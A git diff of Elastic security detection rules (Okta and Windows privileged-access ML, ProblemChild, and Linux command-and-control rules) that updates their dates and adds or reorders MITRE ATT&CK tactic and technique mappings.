Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_privilege_changes.toml b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_privilege_changes.toml index 51b64715dc1..6861aead8f9 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_privilege_changes.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_privilege_changes.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -88,6 +88,7 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" @@ -103,9 +104,20 @@ id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/pad/privileged_access_ml_okta_spike_in_user_lifecycle_management_changes.toml b/rules/integrations/pad/privileged_access_ml_okta_spike_in_user_lifecycle_management_changes.toml index 6a80f4a7bd4..e394e67f94b 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_spike_in_user_lifecycle_management_changes.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_spike_in_user_lifecycle_management_changes.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -87,6 +87,7 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -97,9 +98,25 @@ id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/pad/privileged_access_ml_windows_high_count_group_management_events.toml b/rules/integrations/pad/privileged_access_ml_windows_high_count_group_management_events.toml index bf61284eae9..b3949f019b3 100644 --- a/rules/integrations/pad/privileged_access_ml_windows_high_count_group_management_events.toml +++ b/rules/integrations/pad/privileged_access_ml_windows_high_count_group_management_events.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -90,6 +90,7 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -100,9 +101,30 @@ id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/pad/privileged_access_ml_windows_high_count_special_logon_events.toml b/rules/integrations/pad/privileged_access_ml_windows_high_count_special_logon_events.toml index d287e6828b1..78f44f6aa21 100644 --- a/rules/integrations/pad/privileged_access_ml_windows_high_count_special_logon_events.toml +++ b/rules/integrations/pad/privileged_access_ml_windows_high_count_special_logon_events.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -87,6 +87,7 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" @@ -97,9 +98,12 @@ id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.002" +name = "Domain Accounts" +reference = "https://attack.mitre.org/techniques/T1078/002/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/integrations/pad/privileged_access_ml_windows_high_count_special_privilege_use_events.toml b/rules/integrations/pad/privileged_access_ml_windows_high_count_special_privilege_use_events.toml index 581372213fe..84704015718 100644 --- a/rules/integrations/pad/privileged_access_ml_windows_high_count_special_privilege_use_events.toml +++ b/rules/integrations/pad/privileged_access_ml_windows_high_count_special_privilege_use_events.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -89,6 +89,7 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" @@ -99,9 +100,25 @@ id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique]] +id = "T1134" +name = "Access Token Manipulation" +reference = "https://attack.mitre.org/techniques/T1134/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1134" +name = "Access Token Manipulation" +reference = "https://attack.mitre.org/techniques/T1134/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/pad/privileged_access_ml_windows_high_count_user_account_management_events.toml b/rules/integrations/pad/privileged_access_ml_windows_high_count_user_account_management_events.toml index ece76dfc05e..655cc425870 100644 --- a/rules/integrations/pad/privileged_access_ml_windows_high_count_user_account_management_events.toml +++ b/rules/integrations/pad/privileged_access_ml_windows_high_count_user_account_management_events.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -89,6 +89,7 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" @@ -99,9 +100,30 @@ id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique]] +id = "T1136" +name = "Create Account" +reference = "https://attack.mitre.org/techniques/T1136/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/pad/privileged_access_ml_windows_rare_device_by_user.toml b/rules/integrations/pad/privileged_access_ml_windows_rare_device_by_user.toml index 3ddc61961fd..8651e7f6c41 100644 --- a/rules/integrations/pad/privileged_access_ml_windows_rare_device_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_windows_rare_device_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -89,14 +89,26 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/pad/privileged_access_ml_windows_rare_group_name_by_user.toml b/rules/integrations/pad/privileged_access_ml_windows_rare_group_name_by_user.toml index afb390d2236..539df8411c5 100644 --- a/rules/integrations/pad/privileged_access_ml_windows_rare_group_name_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_windows_rare_group_name_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -91,6 +91,7 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" @@ -101,21 +102,48 @@ id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/pad/privileged_access_ml_windows_rare_privilege_assigned_to_user.toml b/rules/integrations/pad/privileged_access_ml_windows_rare_privilege_assigned_to_user.toml index f7407fd1638..c8216dd03c8 100644 --- a/rules/integrations/pad/privileged_access_ml_windows_rare_privilege_assigned_to_user.toml +++ b/rules/integrations/pad/privileged_access_ml_windows_rare_privilege_assigned_to_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -89,6 +89,7 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" @@ -99,9 +100,25 @@ id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/pad/privileged_access_ml_windows_rare_region_name_by_user.toml b/rules/integrations/pad/privileged_access_ml_windows_rare_region_name_by_user.toml index c3078e43d19..697850d9351 100644 --- a/rules/integrations/pad/privileged_access_ml_windows_rare_region_name_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_windows_rare_region_name_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -89,14 +89,26 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/pad/privileged_access_ml_windows_rare_source_ip_by_user.toml b/rules/integrations/pad/privileged_access_ml_windows_rare_source_ip_by_user.toml index e62fe19f6d7..af481beafbb 100644 --- a/rules/integrations/pad/privileged_access_ml_windows_rare_source_ip_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_windows_rare_source_ip_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -88,14 +88,26 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_parent_process.toml b/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_parent_process.toml index abb8bb47e03..f0e3a9b3eb4 100644 --- a/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_parent_process.toml +++ b/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_parent_process.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/16" integration = ["problemchild", "endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -94,14 +94,18 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_user.toml b/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_user.toml index 513d1a8b875..182abe9bb6f 100644 --- a/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_user.toml +++ b/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_user.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/16" integration = ["problemchild", "endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -94,14 +94,18 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_host.toml b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_host.toml index 22b4da6597d..9e43cb9de27 100644 --- a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_host.toml +++ b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_host.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/16" integration = ["problemchild", "endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -93,14 +93,18 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_parent_process.toml b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_parent_process.toml index 7b94ae3ca14..1d01817a6fc 100644 --- a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_parent_process.toml +++ b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_parent_process.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/16" integration = ["problemchild", "endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -95,14 +95,18 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_user.toml b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_user.toml index a5b82dcbbf8..9202b9bc1d7 100644 --- a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_user.toml +++ b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_user.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/16" integration = ["problemchild", "endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -95,14 +95,18 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/linux/command_and_control_aws_cli_endpoint_url_used.toml b/rules/linux/command_and_control_aws_cli_endpoint_url_used.toml index 2bbc37b2ccd..543cda8067c 100644 --- a/rules/linux/command_and_control_aws_cli_endpoint_url_used.toml +++ b/rules/linux/command_and_control_aws_cli_endpoint_url_used.toml @@ -2,7 +2,7 @@ creation_date = "2024/08/21" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -94,11 +94,15 @@ id = "T1102" name = "Web Service" reference = "https://attack.mitre.org/techniques/T1102/" +[[rule.threat.technique.subtechnique]] +id = "T1102.002" +name = "Bidirectional Communication" +reference = "https://attack.mitre.org/techniques/T1102/002/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id"] diff --git a/rules/linux/command_and_control_cat_network_activity.toml b/rules/linux/command_and_control_cat_network_activity.toml index cab972324d4..595b48de83d 100644 --- a/rules/linux/command_and_control_cat_network_activity.toml +++ b/rules/linux/command_and_control_cat_network_activity.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/04" integration = ["endpoint"] maturity = "production" -updated_date = "2025/09/16" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -156,6 +156,11 @@ sequence by host.id, process.entity_id with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" @@ -172,6 +177,11 @@ reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" diff --git a/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml b/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml index 5356874e6a6..a5c56ca1d6e 100644 --- a/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml +++ b/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/27" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -127,6 +127,16 @@ reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" @@ -152,3 +162,16 @@ framework = "MITRE ATT&CK" id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/linux/command_and_control_curl_socks_proxy_detected.toml b/rules/linux/command_and_control_curl_socks_proxy_detected.toml index cfdde4aab58..f9a315aebd8 100644 --- a/rules/linux/command_and_control_curl_socks_proxy_detected.toml +++ b/rules/linux/command_and_control_curl_socks_proxy_detected.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint"] maturity = "production" -updated_date = "2025/09/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -124,6 +124,16 @@ Curl is a versatile command-line tool used for transferring data with URLs, ofte [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + +[[rule.threat.technique.subtechnique]] +id = "T1090.002" +name = "External Proxy" +reference = "https://attack.mitre.org/techniques/T1090/002/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/linux/command_and_control_frequent_egress_netcon_from_sus_executable.toml b/rules/linux/command_and_control_frequent_egress_netcon_from_sus_executable.toml index 64968e762a3..a874dbd6731 100644 --- a/rules/linux/command_and_control_frequent_egress_netcon_from_sus_executable.toml +++ b/rules/linux/command_and_control_frequent_egress_netcon_from_sus_executable.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/20" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -174,3 +174,21 @@ reference = "https://attack.mitre.org/techniques/T1071/" id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1564" +name = "Hide Artifacts" +reference = "https://attack.mitre.org/techniques/T1564/" + +[[rule.threat.technique.subtechnique]] +id = "T1564.001" +name = "Hidden Files and Directories" +reference = "https://attack.mitre.org/techniques/T1564/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml b/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml index 8e5b77e396f..2f8b7c39e64 100644 --- a/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml +++ b/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/25" integration = ["endpoint"] maturity = "production" -updated_date = "2025/09/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -121,6 +121,16 @@ id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" diff --git a/rules/linux/command_and_control_ip_forwarding_activity.toml b/rules/linux/command_and_control_ip_forwarding_activity.toml index f810448aa2e..50818104f4f 100644 --- a/rules/linux/command_and_control_ip_forwarding_activity.toml +++ b/rules/linux/command_and_control_ip_forwarding_activity.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -92,6 +92,16 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + +[[rule.threat.technique.subtechnique]] +id = "T1090.001" +name = "Internal Proxy" +reference = "https://attack.mitre.org/techniques/T1090/001/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/linux/command_and_control_kubectl_networking_modification.toml b/rules/linux/command_and_control_kubectl_networking_modification.toml index 7eb417f4e4d..24c8efd7c55 100644 --- a/rules/linux/command_and_control_kubectl_networking_modification.toml +++ b/rules/linux/command_and_control_kubectl_networking_modification.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "cloud_de maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -122,16 +122,16 @@ process.name == "kubectl" and ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1572" -name = "Protocol Tunneling" -reference = "https://attack.mitre.org/techniques/T1572/" - [[rule.threat.technique]] id = "T1090" name = "Proxy" reference = "https://attack.mitre.org/techniques/T1090/" +[[rule.threat.technique]] +id = "T1572" +name = "Protocol Tunneling" +reference = "https://attack.mitre.org/techniques/T1572/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" diff --git a/rules/linux/command_and_control_linux_chisel_client_activity.toml b/rules/linux/command_and_control_linux_chisel_client_activity.toml index 2f6eb95ac5b..9cda5267dd7 100644 --- a/rules/linux/command_and_control_linux_chisel_client_activity.toml +++ b/rules/linux/command_and_control_linux_chisel_client_activity.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -163,6 +163,11 @@ sequence by host.id, process.entity_id with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git 